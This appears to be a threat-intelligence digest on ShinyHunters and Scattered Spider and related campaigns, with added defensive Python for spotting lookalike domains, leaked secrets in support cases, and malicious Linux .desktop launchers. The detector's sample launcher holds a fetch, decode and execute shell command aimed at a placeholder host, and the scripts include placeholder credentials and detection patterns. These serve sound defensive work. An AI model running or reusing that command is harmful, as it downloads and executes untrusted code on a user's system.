ShinyHunters and Scattered Spider Collaborate on Recent Attacks
Summary
ShinyHunters and Scattered Spider, two distinct cybercrime groups, have shown signs of collaboration in recent attacks on multiple major companies, including Google, Louis Vuitton, Allianz, and Salesforce customers. The partnership pairs ShinyHunters' expertise in large-scale data theft with Scattered Spider's proficiency in social engineering, which complicates detection and defense. Evidence of the collaboration includes shared infrastructure, overlapping targets, and synchronized attack patterns, and both groups now use similar tactics: vishing, domain spoofing, and coordinated targeting of victims in the retail, insurance, and aviation sectors. Because this overlap makes it harder to attribute an attack to a specific group, defenders are advised to focus on behavioral patterns and proactive detection rather than on group-specific indicators. The groups have also been linked to a new ransomware-as-a-service offering called ShinySp1d3r, and BreachForums has been commandeered by international law enforcement agencies and turned into a honeypot.
Timeline
12.08.2025 19:20 · 1 article
New Extortion Campaign and Law Enforcement Actions
The collaboration between ShinyHunters and Scattered Spider is expanding to financial services and technology service providers. ShinyHunters has adopted new tactics, including vishing and other social engineering, and has been involved in the relaunch of BreachForums. A new Telegram channel has emerged that conflates ShinyHunters, Scattered Spider, and LAPSUS$ and claims to be developing a ransomware-as-a-service offering called ShinySp1d3r. The collaboration has been ongoing for over a year, with both groups targeting the same sectors at around the same time. BreachForums has since been commandeered by international law enforcement agencies and now operates as a honeypot.
Sources:
- Cybercrime Groups ShinyHunters, Scattered Spider Join Forces in Extortion Attacks on Businesses · thehackernews.com · 12.08.2025 19:20
12.08.2025 15:00 · 1 article
ShinyHunters and Scattered Spider Collaborate on Recent Attacks
ShinyHunters and Scattered Spider have shown signs of collaboration in recent attacks on multiple major companies, including Google, Louis Vuitton, and Allianz. Evidence includes shared infrastructure, overlapping targets, and synchronized attack patterns, and both groups now use similar tactics: vishing, domain spoofing, and coordinated targeting of victims in the retail and insurance sectors. The overlap makes it harder to trace an attack back to a specific group, so defenders should focus on behavioral patterns and proactive detection measures rather than group-specific attribution.
Sources:
- ShinyHunters Tactics Now Mirror Scattered Spider · www.darkreading.com · 12.08.2025 15:00
Information Snippets
- ShinyHunters and Scattered Spider have been observed collaborating in recent attacks.
- The collaboration involves shared infrastructure, overlapping targets, and synchronized attack patterns.
- ShinyHunters has adopted tactics similar to Scattered Spider, including vishing and domain spoofing.
- Both groups have targeted victims in the retail and insurance sectors, with synchronized attack patterns.
- The collaboration makes it harder to trace attacks back to specific groups, complicating defense efforts.
- Defenders are advised to focus on behavioral patterns and proactive detection measures.
All snippets first reported 12.08.2025 15:00 (2 sources, 2 articles):
- ShinyHunters Tactics Now Mirror Scattered Spider · www.darkreading.com · 12.08.2025 15:00
- Cybercrime Groups ShinyHunters, Scattered Spider Join Forces in Extortion Attacks on Businesses · thehackernews.com · 12.08.2025 19:20
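The snippets above name domain spoofing as a shared tactic and advise detecting on behavior rather than on which group is behind an attack. One proactive control that follows from both points is screening newly registered or newly observed domains for lookalikes of your own brand before they can be used in a vishing or phishing pretext. The Python script below is an added example written for this page, not code from either source article or from any group or vendor mentioned. The brand, the allowlist of legitimate domains, the sample domain feed, the homoglyph map and the list of SSO- and help-desk-themed tokens are all constructed assumptions.

```python
import re

# Assumed inputs (constructed for this example, not from the reporting above).
BRAND = "contoso"                                # registrable label of the protected brand
LEGIT_DOMAINS = {"contoso.com", "contoso.net"}  # domains the brand actually owns
SAMPLE_FEED = [                                  # e.g. a daily newly-registered-domain feed
    "contoso.com",           # legitimate apex
    "sso.contoso.com",       # legitimate subdomain
    "contoso.org",           # brand on a TLD it does not own
    "contoso-sso.com",       # brand + SSO-themed token
    "contoso-helpdesk.net",  # brand + help-desk-themed token
    "c0ntoso.com",           # digit-for-letter homoglyph
    "contso.com",            # single-character typo
    "contosoportal.io",      # brand embedded in a longer label
    "example.org",           # unrelated
]

# Assumed: tokens that IT-help-desk and SSO-themed lures tend to pair with a brand.
SUSPICIOUS_TOKENS = {"sso", "okta", "login", "helpdesk", "servicedesk", "support",
                     "vpn", "mfa", "it"}

# Assumed homoglyph folding: digits and symbols that visually stand in for letters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                            "7": "t", "@": "a", "$": "s"})


def normalize(label: str) -> str:
    """Fold homoglyphs back to letters and drop separators so lookalikes compare equal."""
    label = label.lower().replace("rn", "m").replace("vv", "w")
    return re.sub(r"[^a-z0-9]", "", label.translate(HOMOGLYPHS))


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete and substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Second-level label. Simplification: multi-part public suffixes like co.uk are not handled."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain: str, brand: str, legit: set) -> list:
    """Return the reasons a domain looks like a spoof of `brand`; an empty list means not flagged."""
    domain = domain.lower().strip(".")
    if domain in legit or any(domain.endswith("." + d) for d in legit):
        return []                                   # allowlisted: the brand's own domains
    label = registrable_label(domain)
    tokens = {normalize(t) for t in label.split("-")}
    norm = normalize(label)
    reasons = []
    if label == brand:
        reasons.append("tld-squat")                 # contoso.org when only .com/.net are owned
    if norm == brand and label != brand:
        reasons.append("homoglyph")                 # c0ntoso -> contoso
    if brand in tokens and tokens & SUSPICIOUS_TOKENS:
        reasons.append("sso-themed")                # contoso-sso, contoso-helpdesk
    if not reasons and 0 < levenshtein(norm, brand) <= 2:
        reasons.append("typosquat")                 # contso
    if not reasons and brand in norm and norm != brand:
        reasons.append("brand-embedded")            # contosoportal
    return reasons


def triage(feed, brand: str, legit: set) -> dict:
    """Map each flagged domain in the feed to its reasons, for analyst review or blocking."""
    hits = {}
    for domain in feed:
        reasons = classify(domain, brand, legit)
        if reasons:
            hits[domain] = reasons
    return hits


if __name__ == "__main__":
    for domain, reasons in triage(SAMPLE_FEED, BRAND, LEGIT_DOMAINS).items():
        print(f"{domain:24} {', '.join(reasons)}")
```

The allowlist check runs first so the brand's own subdomains (sso.contoso.com) never trip the SSO-themed rule; everything else is judged on the registrable label alone, which is the part a registrant controls. The edit-distance and brand-embedded rules are deliberately suppressed when a more specific rule has already fired, so each hit carries one primary reason for the analyst.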
Similar Happenings
Chinese State-Sponsored Actors Compromise Global Critical Infrastructure Networks
Chinese state-sponsored Advanced Persistent Threat (APT) actors, including the group known as Salt Typhoon, have been conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. The campaign targets telecommunications, transportation, lodging, and military networks, exploits vulnerabilities in routers, and takes steps to evade detection and maintain persistent access. The Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and international partners, released a joint advisory detailing this ongoing activity and providing actionable guidance and intelligence for defenders. The advisory builds on previous reporting and incorporates threat intelligence from investigations conducted through August 2025; its indicators overlap with industry reporting on several Chinese state-sponsored groups, and it attributes the cluster to multiple APTs that only partially overlap with Salt Typhoon. Salt Typhoon has been active since at least 2019 and has targeted at least 600 organizations in 80 countries, including 200 in the U.S. Separately, the Czech Republic's National Cyber and Information Security Agency (NUKIB) issued a warning about transfers of system and user data to the PRC and about the remote administration of technical assets from China. The Czech government had previously accused China of targeting its critical infrastructure through APT31 in a campaign that began in 2022. China's offensive cyber activity includes large-scale telecommunications intrusions by Salt Typhoon and pre-positioning for potential destructive cyberattacks.
The advisory details how state-backed actors, including Salt Typhoon, penetrate networks around the world and how defenders can protect their own environments. NUKIB assesses the risk of significant disruption caused by China as 'High', indicating a high probability of occurrence, and has confirmed malicious activity by Chinese cyber actors against the Czech Republic, including a recent APT31 campaign against the Czech Ministry of Foreign Affairs. NUKIB warns that Chinese law gives the Chinese government access to data held by Chinese private companies, including cloud service providers operating in the Czech Republic, so sensitive data stored with them is always within the state's reach. It also flags devices manufactured by Chinese firms, such as smartphones, IP cameras, electric cars, large language models, medical devices, and photovoltaic converters, as risky because they can transfer potentially sensitive data to Chinese infrastructure. In related research, 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, with the oldest registration activity dating back to May 2020.
Salesloft OAuth breach exposes Salesforce customer data via Drift AI chat agent
A threat actor tracked as UNC6395 used stolen OAuth tokens for the Drift AI chat agent to access customer data across Salesloft Drift's integrations, including Salesforce and Google Workspace. The breach occurred between August 8 and 18, 2025 and affected over 700 organizations, including Zscaler, Palo Alto Networks, Cloudflare, Google, PagerDuty, Proofpoint, SpyCloud, and Tanium. The attackers systematically exported large volumes of data from numerous corporate Salesforce instances, searching for credentials and access tokens that could be used to compromise victim environments, and read email from a small number of Google Workspace accounts. UNC6395 showed operational security awareness by deleting its query jobs. Salesloft and Salesforce took steps to contain the breach and advised affected customers to revoke API keys and rotate credentials; Salesloft also took Drift offline. The campaign is not limited to customers who integrated Salesforce themselves: every integration using Salesloft Drift is in scope, although there is no evidence that Google Cloud customers were directly affected. Google's initial assessment was that the breach was unrelated to the earlier vishing attacks attributed to ShinyHunters. Organizations were urged to review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate connected systems for signs of unauthorized access. The incident highlights the risk of third-party integrations and supply chain attacks, and its blast radius remains uncertain.
Numerous companies disclosed downstream breaches from this campaign, including Zscaler, Palo Alto Networks, Proofpoint, Cloudflare, and Tenable; Zscaler and Palo Alto Networks warned of follow-on social engineering against their customers. Cloudflare confirmed that some of the exposed customer support interactions may reveal a customer's configuration and could contain sensitive information such as access tokens. Okta prevented a breach of its own Salesforce instance by enforcing inbound IP restrictions, points to token binding with DPoP and the IPSIE framework as the broader fix, and recommends that organizations demand IPSIE integration from application vendors and implement an identity security fabric unified across applications. Palo Alto Networks' Unit 42 recommends an immediate log review for signs of compromise and rotation of exposed credentials. The intrusion began with the compromise of Salesloft's GitHub account between March and June 2025: UNC6395 downloaded content from multiple repositories, added a guest user, established workflows, and carried out reconnaissance in the Salesloft and Drift application environments during that period. Salesloft isolated the Drift infrastructure, application, and code, took the application offline on September 5, 2025, rotated credentials in the Salesloft environment, and hardened it with improved segmentation between the Salesloft and Drift applications. Salesforce restored its integration with the Salesloft platform on September 7, 2025, but Drift remains disabled. 22 companies have confirmed they were impacted by the supply chain breach, and ShinyHunters and Scattered Spider have since also been linked to the Salesloft Drift attacks.
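The campaign above hinged on bulk-exported Salesforce records that were then mined for credentials and access tokens, and Cloudflare's note that support interactions can contain access tokens shows why that works: customers paste secrets into tickets. A practical follow-up to Unit 42's log-review advice is to scan your own exported case text for secret-shaped strings, so you know which credentials to rotate and can redact the fields before they are stored or shared again. The Python below is an added example for this page, not code from Salesloft, Salesforce, Google, Cloudflare or any other company named here. The case records are constructed, the credential values are placeholders, and the detection patterns (an AWS access key ID shape, a bearer token, a PEM private-key block, a password embedded in a connection URL) are illustrative assumptions, not indicators from the incident.

```python
import re

# Constructed sample records shaped like Salesforce Case exports (Id, Subject, Description).
# Made up for this example; the secrets are placeholder values, not real credentials.
SAMPLE_CASES = [
    {"Id": "500-0001", "Subject": "SSO not working",
     "Description": "User cannot log in since the MFA rollout. No config attached."},
    {"Id": "500-0002", "Subject": "S3 sync failing",
     "Description": "Here are my creds: aws_access_key_id=AKIAIOSFODNN7EXAMPLE "
                    "aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
    {"Id": "500-0003", "Subject": "API returns 401",
     "Description": "curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJkZW1vIn0.c2lnbmF0dXJl' "
                    "https://api.example.invalid/v1/me"},
    {"Id": "500-0004", "Subject": "Deploy key for the sync job",
     "Description": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----"},
    {"Id": "500-0005", "Subject": "DB connection string",
     "Description": "Connection string: postgres://svc:Sup3rS3cret!@db.internal:5432/app"},
]

# Assumed detection patterns: well-known credential shapes chosen for illustration.
# They are not indicators from the Salesloft Drift incident.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*[A-Za-z0-9/+=]{40}"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-._~+/]{20,}=*"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----"),
    "url_embedded_password": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^@\s]+@"),
}
SCANNED_FIELDS = ("Subject", "Description")


def preview(secret: str) -> str:
    """Show just enough of a match for an analyst to recognise it without re-exposing it."""
    flat = secret.replace("\n", " ")
    return flat[:8] + "..." if len(flat) > 8 else flat


def scan_records(records, fields=SCANNED_FIELDS) -> list:
    """One finding per secret-shaped match: record Id, field, kind, and a masked preview."""
    findings = []
    for rec in records:
        for field in fields:
            text = rec.get(field) or ""
            for kind, pattern in SECRET_PATTERNS.items():
                for match in pattern.finditer(text):
                    findings.append({"Id": rec["Id"], "field": field, "kind": kind,
                                     "preview": preview(match.group(0))})
    return findings


def affected_record_ids(findings) -> list:
    """Sorted Ids of records whose owners must rotate the exposed credentials."""
    return sorted({f["Id"] for f in findings})


def redact(text: str) -> str:
    """Replace every secret-shaped match with a labelled placeholder."""
    for kind, pattern in SECRET_PATTERNS.items():
        text = pattern.sub(f"[REDACTED:{kind}]", text)
    return text


def redact_records(records, fields=SCANNED_FIELDS) -> list:
    """Copies of the records with the scanned fields redacted; the originals are left untouched."""
    return [{**rec, **{f: redact(rec.get(f) or "") for f in fields}} for rec in records]


if __name__ == "__main__":
    found = scan_records(SAMPLE_CASES)
    for f in found:
        print(f"{f['Id']} {f['field']:<11} {f['kind']:<22} {f['preview']}")
    print("rotate credentials for:", ", ".join(affected_record_ids(found)))
```

Run it against a real export by loading the CSV or Bulk API result into the same list-of-dicts shape. The findings list, not the redacted text, is what goes to the owners of the affected records: they need the kind and the record, not the secret itself, to decide what to rotate.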
APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign
APT36, a Pakistani cyber espionage group, is actively abusing Linux .desktop files to deliver malware to government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. The 'Exec=' field of a .desktop launcher runs arbitrary shell commands when the file is opened; the attackers use it to fetch a hex-encoded payload from attacker-controlled servers or Google Drive, decode it, and execute it to establish persistent access and exfiltrate data. The payload is a Go-based ELF executable built for espionage that maintains stealth, establishes persistence through cron jobs and systemd services, and communicates with its command-and-control (C2) server over a bidirectional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.
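The technique above works because a .desktop file is a launcher: whatever is in 'Exec=' runs when the user double-clicks what looks like a PDF. A mail gateway or endpoint agent can parse the file as text and flag launchers that behave like droppers before they reach a desktop. The Python below is an added example written for this page, not code from the researchers who reported the campaign or from APT36's tooling. Both .desktop samples are constructed to reproduce the mechanics described (a document-like name, a shell command that fetches and hex-decodes a payload); the URL is a non-routable placeholder and the heuristics and alert threshold are assumptions.

```python
import re

# Constructed samples. Neither is a file recovered from the APT36 campaign; they only
# reproduce the .desktop mechanics the reporting describes.
BENIGN_DESKTOP = """\
[Desktop Entry]
Version=1.0
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
Terminal=false
Categories=Network;WebBrowser;
"""

SUSPICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p.hex | xxd -r -p > /tmp/.x && chmod +x /tmp/.x && /tmp/.x &"
"""

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")


def parse_desktop(text: str) -> dict:
    """Minimal parser for the [Desktop Entry] group: Key=Value lines; comments and other groups ignored."""
    entry, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        if group == "Desktop Entry" and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def analyze(text: str) -> list:
    """Heuristics for a launcher that behaves like a dropper; returns the reasons that fired."""
    entry = parse_desktop(text)
    exec_cmd = entry.get("Exec", "")
    name = entry.get("Name", "").lower()
    reasons = []
    if name.endswith(DOC_EXTENSIONS):
        reasons.append("document_disguise")        # launcher named like a document
    if re.search(r"(^|[\s/])(ba)?sh\s+-c\b", exec_cmd):
        reasons.append("shell_wrapper")            # Exec= hands a string to a shell
    if re.search(r"\b(curl|wget)\b", exec_cmd):
        reasons.append("remote_fetch")             # pulls content from the network
    if re.search(r"\bxxd\s+-r|\bbase64\s+(-d|--decode)\b|\\x[0-9a-fA-F]{2}", exec_cmd):
        reasons.append("encoded_payload")          # hex or base64 decoding inside the launcher
    if re.search(r"/tmp/\.|/dev/shm/|chmod\s+\+x", exec_cmd):
        reasons.append("drops_executable")         # writes a hidden file and marks it executable
    if re.search(r"""&\s*["']?\s*$|\bnohup\b""", exec_cmd):
        reasons.append("background_exec")          # detaches so the user sees nothing
    return reasons


def is_suspicious(text: str, threshold: int = 2) -> bool:
    """Two or more independent signals is the assumed alerting bar for this example."""
    return len(analyze(text)) >= threshold


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_DESKTOP), ("suspicious", SUSPICIOUS_DESKTOP)):
        print(f"{label:11} suspicious={is_suspicious(sample)} reasons={analyze(sample)}")
```

A single signal is not enough on its own: plenty of legitimate launchers use `sh -c`, and some fetch updates with curl. The combination of a document-style name with a shell wrapper that downloads, decodes and backgrounds something in /tmp is what separates a lure from a launcher, which is why the example alerts only when at least two signals fire.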
XenoRAT malware campaign targets foreign embassies in South Korea
A state-sponsored espionage campaign has targeted foreign embassies in South Korea since March 2025, deploying XenoRAT malware from malicious GitHub repositories. At least 19 spearphishing attacks have been launched against high-value targets, including Central and Western European embassies. The attacks are attributed with medium confidence to the North Korean actor Kimsuky (APT43), although activity patterns, including working hours consistent with a Chinese timezone and holiday pauses, point to possible Chinese involvement. XenoRAT is a full-featured trojan capable of logging keystrokes, capturing screenshots, accessing webcams and microphones, transferring files, and providing a remote shell. The campaign used highly contextual, multilingual email lures, often timed to real events, that delivered password-protected archives containing malicious .LNK files, with a decoy document masking the malicious activity. Payloads were hosted on cloud storage such as Dropbox and Daum Cloud to help the activity fly under the radar, the attackers rotated infrastructure rapidly to avoid detection, and they used Korean services and infrastructure to blend into South Korean network traffic.
Curly COMrades APT Targets Georgian and Moldovan Entities Using NGEN COM Hijacking
Curly COMrades, a newly identified APT group, has been targeting government and judicial bodies in Georgia and an energy distribution company in Moldova since at least November 2023. The group employs a methodical approach to gain long-term access to target networks, using legitimate tools and custom malware to extract sensitive data and maintain persistence. The attackers focus on extracting NTDS databases and LSASS memory to obtain user credentials. They use the MucorAgent backdoor to hijack COM objects in the Native Image Generator (Ngen) component of the .NET Framework, enabling persistent access and command execution under the SYSTEM account. The group's tactics include using compromised websites as C2 relays and leveraging tools like CurlCat, RuRat, Mimikatz, and PowerShell scripts for data exfiltration and reconnaissance.